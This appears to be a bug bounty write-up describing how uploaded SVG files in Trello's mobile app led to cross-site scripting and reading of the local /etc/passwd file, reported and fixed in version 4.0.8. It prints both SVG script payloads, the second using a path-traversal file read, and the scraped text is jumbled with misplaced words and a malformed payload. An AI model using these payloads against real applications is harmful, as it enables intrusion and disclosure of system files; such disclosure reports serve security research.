Report Status: Fixed is a collaboration tool that organizes your projects into boards. In one glance, Trello tells you what’s being worked on, who’s working on what, and where something is in a process. Trello They launched their Bug Bounty Program on February 2nd, 2015. They pay bounties in exchange for a valid bug starting from $256 up to $4096, depending on the severity of the bug. Vulnerability Trello allows its users to upload a file through their mobile application. By observing how does the upload feature work, I noticed that some file types executes directly on the Trello app. Exploitation I created a file with file extension containing a malicious script that will execute once accessed or opened. .svg <?xml version="1.0" encoding="UTF-8" standalone="yes"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.location);</script></svg> After uploading the file above on Trello’s app, I successfully executed a simple Cross-Site . Scripting Cross-Site Scripting on Trello Then, I noticed that the file was not just uploaded in their third party service storage but it was also uploaded locally. That is why I quickly remembered that it was possible to perform a Local File Inclusion. So, I created another payload inside the file that will locate, access, and execute the file. .svg /etc/passwd <?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?><svg xmlns=” "><script>function readTextFile(file){var rawFile = new XMLHttpRequest();rawFile.open(“GET”, file, false);rawFile.onreadystatechange = function (){ http://www.w3.org/2000/svg if(rawFile.readyState === 4){ if(rawFile.status === 200 || rawFile.status == 0){ var allText = rawFile.responseText; alert(allText); } } rawFile.send(null); readTextFile(“file:///../../../../../../../../../etc/passwd”);</script></svg> After uploading the new file, I successfully displayed the content of file. .svg /etc/passwd Reporting Right after the discovery of security vulnerability, Trello triaged and fixed it in version . 4.0.8 Verifying the Fix Shown below is the screenshot of the fix applied by Trello. If you’d like to try bug bounty hunting or report a possible security vulnerability, you may view their Bug Bounty Program Policy on . HackerOne
